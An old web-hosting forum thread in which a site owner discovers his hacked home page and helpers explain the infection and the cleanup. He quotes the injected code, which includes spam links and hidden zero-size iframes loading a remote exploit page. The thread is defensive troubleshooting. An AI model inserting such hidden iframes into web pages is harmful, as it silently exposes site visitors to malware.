Viruses on website - help & questions

Viruses on website - help & questions (Full Version)

All Forums >> [Web Development] >> Server Issues

Message

RickP -> Viruses on website - help & questions (10/16/2006 12:30:29)
Hi - it's been a while since I've posted here - no particular reason - but today I urgently need some help and advice... A few weeks back I accessed my site from someone's PC and their virus scanner immediately blocked a virus. I wasn't sure if it related to my site or not but just a short while after it happened again! I contacted the hosts who assured me that all was clear. Today I have had a call from someone informing me that the site has several viruses - detected by their AV. I have left a message with the hosts but am wondering if there is anything else I can do? Here's a question first... Does this mean that my site in particular is infected or is the whole server infected and the same would be happening to all sites on that server? Anyhow, any help, information and advice would be appreciated.

Spooky -> RE: Viruses on website - help & questions (10/16/2006 14:30:09)
Do you have any more details on the detected virus?

jaybee -> RE: Viruses on website - help & questions (10/16/2006 16:49:36)
Find out from all of them which AV they're using. If your host says it's clean and they're all using the same one, suspect false positives.

BobbyDouglas -> RE: Viruses on website - help & questions (10/16/2006 18:47:41)
Unix/linux web hosts don't run the normal batch of AV software that most consumers are used to. The best thing to do is ask you host for a zip of the entire hosting account (even the stuff located below the public_html and www folders). Then use your AV to scan the zip file.

RickP -> RE: Viruses on website - help & questions (10/17/2006 3:42:58)

Thanks to all for the useful replies

I've just accessed the site and my AV caught this...

The JScript/Ludvc.1ip!Trojan was detected in C:\DOCUMENTS AND SETTINGS\RICK\LOCAL 
SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\OF93A2JT\TEST[1].HTM.
Machine: MAXX, User: MAXX\Rick.
File Status: File was cured; system cure performed.

RickP -> RE: Viruses on website - help & questions (10/17/2006 3:49:38)
The home page has been hacked and the code below inserted quote: <a href="http://www.ivorysky.com/img/flags/10px/company_uniform.html">company uniform</a> <a href="http://www.ivorysky.com/img/flags/10px/postal_trucks_for_sale.html">trucks for sale</a> <a href="http://www.ivorysky.com/img/flags/10px/usmc_wwii_uniforms.html">wwii uniforms</a> <a href="http://www.ivorysky.com/img/flags/10px/for_sale_aluma_laser.html">aluma laser</a> <a href="http://www.ivorysky.com/img/flags/10px/bad_credit_home_purchase_loan.html">bad credit home loan</a> <a href="http://www.ivorysky.com/img/flags/10px/terra_travel.html">terra travel</a> Also this (which was the problem before) warning, the follow links below may contain a virus quote: <iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe> <iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>

jaybee -> RE: Viruses on website - help & questions (10/17/2006 5:51:25)
Looking at that and doing some checking... The first one, ivorysky, is local to me so I could go round and break his legs for you. BUT, I don't think it's him. All the links are 404 and having checked his site it looks to me like he got hacked too and a folder of banners inserted. They've now gone. Check your site to make sure there are no new folders appearing. The second one however is Russian. Oh surprise, surprise. Domain Name: ISECUREPAGES.NET Registrant: hcenter Petrov Vladimir Vladimirovich hcenter@list.ru ul. Lenina, d. 20, kv.5 Moskva Moskva,111111 RU Tel. +7.1111111111 Now he's obviously got in via a security hole. What PHP scripts are you running?

BobbyDouglas -> RE: Viruses on website - help & questions (10/17/2006 9:34:05)
Most likely a bot just scanned your website and found a very outdated script. You really won't even be able to tell that you have been hacked until you get the virus warnings. I would 1) find out how the person came in 2) correct the hole 3) revert back to a backup before you were hacked As long as your database is displaying the correct data, then you should be able to back up the database (on the hacked site) and then restore all html/php/asp files and then use the latest database. Every case I have seen where the database still displays normal data, it has not been tampered with. You still take a chance though restoring that db. If you are with a good host, they should help you out a bit in terms of getting everything resolved.

RickP -> RE: Viruses on website - help & questions (10/17/2006 12:26:33)
Bobby... Thanks for the sensible edit to my post - re virus warnings related to the URLs, and for the further suggestions. I wonder, would it be best to delete the entire site and just upload it again? Jaybee... Yes, the PHP contact form could be a weak spot (?). I spent a lot of time seeking out a 'secure' type form to use as a basis for it but I cannot properly judge as my PHP knowledge is limited to adapting pre-written scripts only. Do you know which is the 'best' script available? I notice that a lot of forms are now using a graphic with disguised numbers/letter to enter, which are not machine readable but I suppose that will only stop automated attacks but not if someone wants to abuse the form in person, so to speak. I have some further info from my hosts... quote: There was a problem a few weeks ago whereby code was added to some sites on some of our servers. This was possible due to a cPanel exploit that has since been patched by cPanel... ...the virus on the web site tries to exploit a security hole in IE, the VML exploit, but this has since been patched by Microsoft... I'm really fed up today [>:] Oh, P.S. Jaybee, you're very sweet, offering to breaks legs and all that - not really necessary but it's a much appreciated sentiment [;)]

jaybee -> RE: Viruses on website - help & questions (10/17/2006 12:42:37)
quote: Do you know which is the 'best' script available? It's unlikely they can get in via a form but go to the CSS Forum and there's a post on there from Mike Cherim about a secure accessible form he's been working on. You can download it all free from his site, there are great instructions on the page as well. If you get any problems I'm sure he'd be happy to hear from you. quote: This was possible due to a cPanel exploit that has since been patched by cPanel... Then that is not your problem, well the aftermath is but the original hole isn't. Still go get Mike's form though. [:D] My site got whacked via phpBB and along with many thousands of others, all the pages were defaced. I wiped the lot then reloaded the entire site. quote: a problem a few weeks ago !!! and they didn't think to mention it! I'd get round the entire problem by getting a new host.

RickP -> RE: Viruses on website - help & questions (10/17/2006 12:54:11)
quote: It's unlikely they can get in via a form I'd like to hope so - but I'm sure they somehow use (abuse) forms for sending spam - again, not sure how but it would be great to have a truly secure form. I'll check that one out [;)]

RickP -> RE: Viruses on website - help & questions (10/17/2006 12:55:45)
BTW... anyone... Are the inserted code and the virus two issues or one?

BobbyDouglas -> RE: Viruses on website - help & questions (10/17/2006 14:17:26)
Just curious, who was hosting that website for ya? quote: Are the inserted code and the virus two issues or one? - Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus.

RickP -> RE: Viruses on website - help & questions (10/18/2006 15:49:09)
quote: Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus. Ah, I see, so the virus itself is not on my server - right? Is the whole point just to spread a virus? Or is the goal to raise G rankings with the links but the virus just happens to be on one of the lnked site? If no-one sees of activates the links how can the virus come from the other site(s)? or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe? questions, questions, I know, but this would be good to know - thanks!

BobbyDouglas -> RE: Viruses on website - help & questions (10/18/2006 23:51:28)
quote: Ah, I see, so the virus itself is not on my server - right? - It is most likely NOT on your actual server. There could also be viruses on your server, but the one we're talking about here is not on your server. quote: Is the whole point just to spread a virus? - Yes quote: If no-one sees of activates the links how can the virus come from the other site(s)? or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe? - It isn't a link. Basically, you have an iframe (that was most likely inserted by an exploit), that calls on a page at another website, and that page that it is calling has the virus. The virus appears to be an IE exploit. When you try to view the source of the page, it only shows an encrypted piece of javascript. Btw, if you are running a site that is generating income, it might be a good idea to ditch the cheap host.

RickP -> RE: Viruses on website - help & questions (10/19/2006 7:48:14)
Thanks Bobby, that clarifies a lot [;)]

Page: [1]

0.078125